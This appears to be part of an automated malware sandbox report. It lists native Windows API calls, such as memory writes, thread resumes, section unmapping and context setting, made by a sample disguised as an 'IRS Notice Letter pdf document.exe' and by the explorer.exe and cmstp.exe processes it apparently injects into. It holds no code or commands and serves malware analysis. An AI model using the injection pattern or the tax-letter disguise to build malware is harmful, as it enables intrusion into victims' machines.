Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D90BA NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D90A9 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D90D5 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D90C9 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D90FD NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D90F1 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D90E5 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D8119 NtSetInformationThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9115 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D5111 NtSetInformationThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D912D NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9121 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9159 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D914D NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9141 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9175 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9172 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D919C NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D918D NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9181 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D91AD NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D3605 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9604 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D365E NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D3648 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D36A6 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D3705 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D3722 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D3759 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D374D NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D3765 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D3795 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D37BE NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D37D2 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D37E5 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9415 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe, Code function: 0_2_021D9409 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9435 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9429 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D1451 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9441 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9491 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94BD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D34B4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94B1 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94A5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94D9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D34D1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94CD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D34FD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94F9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D34FA NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94F6 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D94E5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3515 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9511 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3509 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9505 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D953E NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D952D NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D955E NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3559 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D354D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D354A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9579 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D956D NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3565 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9561 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D9598 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D35BD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95B5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D35AC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95A9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95D5 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D35C9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95C9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95C6 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D35F9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D35ED NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D95E1 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8A1C NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D0A15 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D0A09 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3A36 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3A25 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8A25 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3A95 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3AAD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3AA1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3AD4 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3AF1 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3AE5 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3B1D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3B14 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D7B3A NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3B35 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3B29 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3819 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D382A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3879 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3868 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3885 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D38BC NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D38D9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D38CD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D08F5 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D393D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D093E NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3931 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D092D NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D392E NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3949 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D397C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D0975 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D3999 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D098D NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D398D NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D0981 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8982 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D39D9 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D09D9 NtSetInformationThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D39CD NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D89FC NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D39E5 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D1E10 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D1E57 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8FCD NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8FF9 NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8FED NtResumeThread,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_021D8FE1 NtResumeThread,
Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exe (functions 1_2_*)
Code function: 1_2_1E279660 NtAllocateVirtualMemory,LdrInitializeThunk,
Code function: 1_2_1E2796E0 NtFreeVirtualMemory,LdrInitializeThunk,
Code function: 1_2_1E279710 NtQueryInformationToken,LdrInitializeThunk,
Code function: 1_2_1E2797A0 NtUnmapViewOfSection,LdrInitializeThunk,
Code function: 1_2_1E279780 NtMapViewOfSection,LdrInitializeThunk,
Code function: 1_2_1E279FE0 NtCreateMutant,LdrInitializeThunk,
Code function: 1_2_1E279540 NtReadFile,LdrInitializeThunk,
Code function: 1_2_1E2795D0 NtClose,LdrInitializeThunk,
Code function: 1_2_1E279A20 NtResumeThread,LdrInitializeThunk,
Code function: 1_2_1E279A00 NtProtectVirtualMemory,LdrInitializeThunk,
Code function: 1_2_1E279A50 NtCreateFile,LdrInitializeThunk,
Code function: 1_2_1E279860 NtQuerySystemInformation,LdrInitializeThunk,
Code function: 1_2_1E279840 NtDelayExecution,LdrInitializeThunk,
Code function: 1_2_1E2798F0 NtReadVirtualMemory,LdrInitializeThunk,
Code function: 1_2_1E279910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Code function: 1_2_1E2799A0 NtCreateSection,LdrInitializeThunk,
Code function: 1_2_1E279610 NtEnumerateValueKey,
Code function: 1_2_1E279670 NtQueryInformationProcess,
Code function: 1_2_1E279650 NtQueryValueKey,
Code function: 1_2_1E2796D0 NtCreateKey,
Code function: 1_2_1E279730 NtQueryVirtualMemory,
Code function: 1_2_1E27A710 NtOpenProcessToken,
Code function: 1_2_1E279760 NtOpenProcess,
Code function: 1_2_1E27A770 NtOpenThread,
Code function: 1_2_1E279770 NtSetInformationFile,
Code function: 1_2_1E279520 NtWaitForSingleObject,
Code function: 1_2_1E27AD30 NtSetContextThread,
Code function: 1_2_1E279560 NtWriteFile,
Code function: 1_2_1E2795F0 NtQueryInformationFile,
Code function: 1_2_1E279A10 NtQuerySection,
Code function: 1_2_1E279A80 NtOpenDirectoryObject,
Code function: 1_2_1E279B00 NtSetValueKey,
Code function: 1_2_1E27A3B0 NtGetContextThread,
Code function: 1_2_1E279820 NtEnumerateKey,
Code function: 1_2_1E27B040 NtSuspendThread,
Code function: 1_2_1E2798A0 NtWriteVirtualMemory,
Code function: 1_2_1E279950 NtQueueApcThread,
Code function: 1_2_1E2799D0 NtCreateProcessEx,
Code function: NtQueryInformationProcess, called from 1_2_00568FAC, 1_2_00569055, 1_2_00569040, 1_2_00569049, 1_2_00569075, 1_2_00569061, 1_2_00569069, 1_2_00569010, 1_2_00569019, 1_2_00569031, 1_2_00569025, 1_2_005690D5, 1_2_005690C9, 1_2_005690F1, 1_2_005690FD, 1_2_005690E5, 1_2_00569091, 1_2_0056909D, 1_2_00569081, 1_2_005690BD, 1_2_005690BA, 1_2_005690A9, 1_2_00569159, 1_2_00569141, 1_2_0056914D, 1_2_00569175, 1_2_00569172, 1_2_00569115, 1_2_00569121, 1_2_0056912D, 1_2_0056919C, 1_2_00569181, 1_2_0056918D, 1_2_005691AD, 1_2_00569254, 1_2_00569241, 1_2_0056926A, 1_2_00569209, 1_2_00569235, 1_2_00569226, 1_2_00569229, 1_2_005692D5, 1_2_005692DD, 1_2_005692C9, 1_2_005692F5, 1_2_005692E9, 1_2_00569295, 1_2_00569289, 1_2_005692B4, 1_2_005692BD, 1_2_005692A1, 1_2_00569356, 1_2_00569345, 1_2_0056936E, 1_2_00569311, 1_2_0056931D, 1_2_00569305, 1_2_00569334, 1_2_005693DD, 1_2_005693F4, 1_2_005693FD, 1_2_00569398, 1_2_00569381, 1_2_005693A9, 1_2_00569441, 1_2_00569415, 1_2_00569409, 1_2_00569435, 1_2_00569429, 1_2_005694D9, 1_2_005694CD, 1_2_005694F6, 1_2_005694F9, 1_2_005694E5, 1_2_00569491, 1_2_005694B1, 1_2_005694BD, 1_2_005694A5, 1_2_0056955E, 1_2_00569579, 1_2_00569561, 1_2_0056956D, 1_2_00569511, 1_2_00569505, 1_2_0056953E, 1_2_0056952D, 1_2_005695D5, 1_2_005695C6, 1_2_005695C9, 1_2_005695E1, 1_2_00569598, 1_2_005695B5, 1_2_005695A9, 1_2_00569604, 1_2_00568FCD, 1_2_00568FF9, 1_2_00568FE1, 1_2_00568FED
Code function: NtProtectVirtualMemory, called from 1_2_005689FC, 1_2_00568982, 1_2_00568A1C, 1_2_00568A25
Source: C:\Windows\SysWOW64\cmstp.exe (functions 3_2_*)
Code function: 3_2_04F995D0 NtClose,LdrInitializeThunk,
Code function: 3_2_04F99540 NtReadFile,LdrInitializeThunk,
Code function: 3_2_04F996E0 NtFreeVirtualMemory,LdrInitializeThunk,
Code function: 3_2_04F996D0 NtCreateKey,LdrInitializeThunk,
Code function: 3_2_04F99660 NtAllocateVirtualMemory,LdrInitializeThunk,
Code function: 3_2_04F99650 NtQueryValueKey,LdrInitializeThunk,
Code function: 3_2_04F99FE0 NtCreateMutant,LdrInitializeThunk,
Code function: 3_2_04F99780 NtMapViewOfSection,LdrInitializeThunk,
Code function: 3_2_04F99710 NtQueryInformationToken,LdrInitializeThunk,
Code function: 3_2_04F99860 NtQuerySystemInformation,LdrInitializeThunk,
Code function: 3_2_04F99840 NtDelayExecution,LdrInitializeThunk,
Code function: 3_2_04F999A0 NtCreateSection,LdrInitializeThunk,
Code function: 3_2_04F99910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Code function: 3_2_04F99A50 NtCreateFile,LdrInitializeThunk,
Code function: 3_2_04F995F0 NtQueryInformationFile,
Code function: 3_2_04F99560 NtWriteFile,
Code function: 3_2_04F9AD30 NtSetContextThread,
Code function: 3_2_04F99520 NtWaitForSingleObject,
Code function: 3_2_04F99670 NtQueryInformationProcess,
Code function: 3_2_04F99610 NtEnumerateValueKey,
Code function: 3_2_04F997A0 NtUnmapViewOfSection,
Code function: 3_2_04F9A770 NtOpenThread,
Code function: 3_2_04F99770 NtSetInformationFile,
Code function: 3_2_04F99760 NtOpenProcess,
Code function: 3_2_04F99730 NtQueryVirtualMemory,
Code function: 3_2_04F9A710 NtOpenProcessToken,
Code function: 3_2_04F998F0 NtReadVirtualMemory,
Code function: 3_2_04F998A0 NtWriteVirtualMemory,
Code function: 3_2_04F9B040 NtSuspendThread,
Code function: 3_2_04F99820 NtEnumerateKey,
Code function: 3_2_04F999D0 NtCreateProcessEx,
Code function: 3_2_04F99950 NtQueueApcThread,
Code function: 3_2_04F99A80 NtOpenDirectoryObject,
Code function: 3_2_04F99A20 NtResumeThread,
Code function: 3_2_04F99A10 NtQuerySection,
Code function: 3_2_04F99A00 NtProtectVirtualMemory,
Code function: 3_2_04F9A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F99B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D8390 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D8260 NtReadFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D82E0 NtClose,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D81B0 NtCreateFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D825B NtReadFile,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D82DB NtClose,
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030D81AA NtCreateFile,
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_00404282
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 0_2_00408AB1
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E256E30
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FD616
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E302EF7
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E301FF1
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E30DFCE
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24841F
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FD466
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B477
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4496
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E230D20
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E302D07
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E301D55
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E262581
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F2D82
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24D5E0
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E3025DD
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2EFA2B
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25B236
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E3022AE
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F4AEF
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E302B28
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A309
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2DCB4F
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25AB40
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26EBB0
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26138B
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2E23E3
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F03DA
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2FDBD2
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E26ABD8
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E30E824
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E25A830
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2F1002
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2620A0
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E3020A8
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E24B090
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E3028EC
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E254120
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E23F900
      Source: C:\Users\user\Desktop\IRS Notice Letter pdf document.exeCode function: 1_2_1E2599BF
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB28F9
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB52FF
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB7062
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB87C7
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB95B2
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB3362
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB2902
      Source: C:\Windows\explorer.exeCode function: 2_2_04DB5302
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05022D07
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05021D55
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050225DD
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F6841F
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F6D5E0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501D466
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F82581
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F50D20
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F76E30
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0502DFCE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05021FF1
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501D616
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05022EF7
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F820A0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F6B090
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F7A830
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05011002
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0502E824
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F799BF
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050220A8
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F74120
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050228EC
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F5F900
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_05022B28
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0501DBD2
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050103DA
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_0500FA2B
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F8EBB0
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_050222AE
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_04F7AB40
      Source: C:\Windows\SysWOW64\cmstp.exeCode function: 3_2_030C2FB0
